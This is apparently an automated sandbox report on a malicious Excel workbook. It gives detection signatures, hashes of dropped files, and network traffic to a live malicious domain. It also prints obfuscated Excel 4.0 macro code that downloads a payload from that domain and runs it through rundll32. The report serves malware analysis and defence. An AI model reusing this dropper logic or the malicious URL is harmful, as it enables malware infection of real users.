Analysis Report SecuriteInfo.com.Heur.19090.20815
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: |
Multi AV Scanner detection for domain / URL | Show sources |
Source: | Virustotal: | Perma Link |
Multi AV Scanner detection for dropped file | Show sources |
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link |
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link |
Source: | File opened: |
Source: | Binary string: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Virustotal: |
Source: | Process created: | ||
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: |
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | Security Software Discovery11 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | System Information Discovery3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting11 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll321 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | Virustotal | Browse |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
22% | Virustotal | Browse | ||
2% | ReversingLabs | Win32.Trojan.Trickpak | ||
22% | Virustotal | Browse | ||
2% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
4% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
9% | Virustotal | Browse | ||
100% | Avira URL Cloud | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
revolet-sa.com | 192.232.249.186 | true | false |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
192.232.249.186 | revolet-sa.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 382978 |
Start date: | 07.04.2021 |
Start time: | 00:39:14 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 18s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Heur.19090.20815 (renamed file extension from 20815 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLS@7/8@1/1 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: |
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
00:39:40 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
192.232.249.186 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
revolet-sa.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\soPLV[1].fbx | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
C:\Users\user\sdbybsd.fds | Get hash | malicious | Browse | ||
Get hash | malicious | Browse |
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: | |
Reputation: | low |
IE Cache URL: | http://revolet-sa.com/files/countryyelow.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 67964 |
Entropy (8bit): | 7.87953531390611 |
Encrypted: | false |
SSDEEP: | 1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF70Zk:LqeRrW2JyW32AiHD2sTU2yF70y |
MD5: | 18D5800BB59D4CDB25D50DF1316B2465 |
SHA1: | 370473B1DF913CE700D9281625282065CC1811EF |
SHA-256: | C73CE424938392370B843621F6260DD20119098D198D0A7608F796EAF246B121 |
SHA-512: | 4984A164DD52680E68B31710C58210222276FA51FA0CB06C50AA17B96AA1849333E856B2BF758BB9927CC13C5DD78CC88ABB4D72B234F3C2F9A7836BDC0B0886 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\SysWOW64\rundll32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 7.031603060981824 |
Encrypted: | false |
SSDEEP: | 48:Kb6U3Xt56fOgWh3c5U3Xl5MSib6U3XH6LHf+6snQvOFZ3XvQKFPF:Kb6AZmq5MFb6We2pMKFPF |
MD5: | 4F8F4D65E7D67B271524E3DDDF2E812D |
SHA1: | AD59D32FF2EFB8083B6138E94184037D18902875 |
SHA-256: | 3310FAB31AF8268161DD1C84DCFB897A747AF01B3B351DB3FE6F13FBD0DEDBA3 |
SHA-512: | 96D98809AA404831495BB278F7F6FD64163BC4DD4C28CD906C9B3583080A7AD909D7AC3ECE9F577C339792945758EE4307032701D61EF5B847B859A5DBA0A56C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.4753143676981315 |
Encrypted: | false |
SSDEEP: | 12:85QxiHcLgXg/XAlCPCHaXgzB8IB/GUMX+WnicvbK+bDtZ3YilMMEpxRljK/bTdJU:85JK/XTwz6IoYezDv3qY/rNru/ |
MD5: | 8D3B7D68629D3D2CF685B79FF61C8368 |
SHA1: | 5C1F0FDC2071992D3D0A0EE1D22F60002B98CFC1 |
SHA-256: | 66C71CA5FBC4919861E4B3059A566C04360B11F27136D4D7C79F1D7838E1CBF4 |
SHA-512: | D03C48E111D8470A14CFF5CFA66A0F3DBD8FBBFFEFF90623BC6232A26AAB98F1AC235BE81129728E9D79053BB64953EE3D9C1BCBEFF64B25E939C658C8329BAA |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2198 |
Entropy (8bit): | 4.556211471537111 |
Encrypted: | false |
SSDEEP: | 48:8o/XT3IxHhHPCHhHKY/Qh2o/XT3IxHhHPCHhHKY/Q/:8o/XLIxhEKY/Qh2o/XLIxhEKY/Q/ |
MD5: | 56591CE780AB2B22145D6C602187FEBC |
SHA1: | A98E9126AE45B21DA40965DBE505A56E21F794F2 |
SHA-256: | 3F1E7DADA6CF93803F73BA57EE80976A36C7138882DECAE9F8744B98D16A5EC4 |
SHA-512: | F5587DDC5C3C3A42455C121695428581938F360BB0202AB18D7F954510AB3ED6A110916E141D19840EC71F0DC509E75AB4412B0E5ED34604454C5B36C6B9B888 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134 |
Entropy (8bit): | 4.692593666327791 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0bIV9CuscbIV9CmM0bIV9Cv:dj60Kl0x |
MD5: | B6FDE063100C2E59B4C1F26331BBF794 |
SHA1: | ACA2DCBB6D739ECCC16A2EFE91727091CDEA3EDD |
SHA-256: | 7E16E199BFD6286940A2F4C04A0C577A8BC09F47808C6A48713BED4EA2D3BE10 |
SHA-512: | 98279B1E55D5DFC45412F292E05AF27502D664A531C95BE47B01623E7B6EDC958FD540D639CD5D05398E58D28AFF8401A3069E101965EF9CD7180A4752CB1E18 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 127008 |
Entropy (8bit): | 7.230450160548897 |
Encrypted: | false |
SSDEEP: | 3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSZ2jTUqyF70XirW2aUvlhaUvlUI8rmjl:G8rmjAItyzElBIL6lECbgBvP5NmuCSei |
MD5: | F55089B3CE118226D0C691787FDFBFF7 |
SHA1: | 46D6091DD5C0EFB2A98C0C7998FBFF06BF8DFA8D |
SHA-256: | 42917635F3AD79A5896F70AE5C4DE8C796EB820E44C7AB283EAD581FEF9373CB |
SHA-512: | 78B96817D6EFCBD1BC91E70F2F6697A8C6FC9C468B4852B6A8CC5E69870E18902F04A07837C560C53A7F99556502937B9B6F71B65916D91021603A3E114C4B4F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: | |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.087349849990019 |
TrID: |
|
File name: | SecuriteInfo.com.Heur.19090.xls |
File size: | 267776 |
MD5: | daf2b1b562a007a93fbe00dee3ec93d3 |
SHA1: | eed18fda9a83a4d6bdc1d65ea29c6dc62dddaf5f |
SHA256: | ac5eb1618543365bfdbd27633949fc179424317db799d2ca55e39f0ef88fff44 |
SHA512: | 65dddd98085bb38798b93ba896cf4a821d509c073bdd9133c13b6a10210026e1237c6bf799521476304b2cf0f7249c97535863a0d5f56408c935a4922807b959 |
SSDEEP: | 6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0u:Fhu |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Heur.19090.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-06 14:04:37 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.342986545458 |
Base64 Encoded: | False |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.247521269318 |
Base64 Encoded: | False |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 255780 |
Entropy: | 3.03349063455 |
Base64 Encoded: | True |
Macro 4.0 Code |
---|
,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
=HALT()
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 00:40:05.632895947 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.632936001 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633045912 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633050919 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633084059 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633097887 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633111000 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633141994 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633183002 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633200884 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633214951 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633227110 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633270979 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633295059 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633304119 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633310080 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633351088 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633378029 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633409023 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633416891 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633418083 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633462906 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633476973 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633505106 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633523941 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633543968 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633549929 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633584976 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633625031 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633642912 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633651972 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633663893 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633699894 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633713007 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633745909 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 00:40:05.633757114 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 00:40:05.633790016 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 00:40:04.542113066 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 00:40:04.590847969 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 00:40:04.542113066 CEST | 192.168.2.22 | 8.8.8.8 | 0x2c09 | Standard query (0) |  | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 00:40:04.590847969 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) |  |  | 192.232.249.186 | A (IP address) | IN (0x0001) |
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 192.232.249.186 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
